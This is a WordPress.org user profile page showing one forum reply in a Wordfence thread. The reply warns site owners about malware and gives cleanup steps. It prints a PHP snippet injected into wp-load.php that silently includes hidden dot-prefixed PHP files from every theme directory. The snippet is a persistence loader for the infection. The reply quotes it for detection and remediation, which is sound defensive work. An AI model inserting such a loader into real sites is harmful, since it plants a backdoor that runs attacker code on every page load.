Title: ainf's Replies | WordPress.org

---

# ainf

  [  ](https://wordpress.org/support/users/ainf/)

 *   [Profile](https://wordpress.org/support/users/ainf/)
 *   [Topics Started](https://wordpress.org/support/users/ainf/topics/)
 *   [Replies Created](https://wordpress.org/support/users/ainf/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/ainf/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/ainf/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/ainf/engagements/)
 *   [Favorites](https://wordpress.org/support/users/ainf/favorites/)

 Search replies:

## Forum Replies Created

Viewing 1 replies (of 1 total)

 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Wordfence Security - Firewall, Malware Scan, and Login Security] Have you cover this malware yet?](https://wordpress.org/support/topic/have-you-cover-this-malware-yet/)
 *  [ainf](https://wordpress.org/support/users/ainf/)
 * (@ainf)
 * [5 years, 6 months ago](https://wordpress.org/support/topic/have-you-cover-this-malware-yet/#post-13579669)
 * Hi everyone,
 * I have an additional IMPORTANT note about this malware!!!
 * CHECK your wp-load.php, if it contains this code:
 *     ```
       if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) {
           foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
               $templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
               if( file_exists( $templates ) ) {
                   include_once( $templates );
               }
           }
       }
       ```
   
 * urgently follow these steps:
    1. Remove this code from wp-load.php 2. Find and
   remove all files “.[dir_name].php” as advised above! 3. CHANGE ALL PASSWORDS 
   KEYS AND SALTS in wp-config.php

Viewing 1 replies (of 1 total)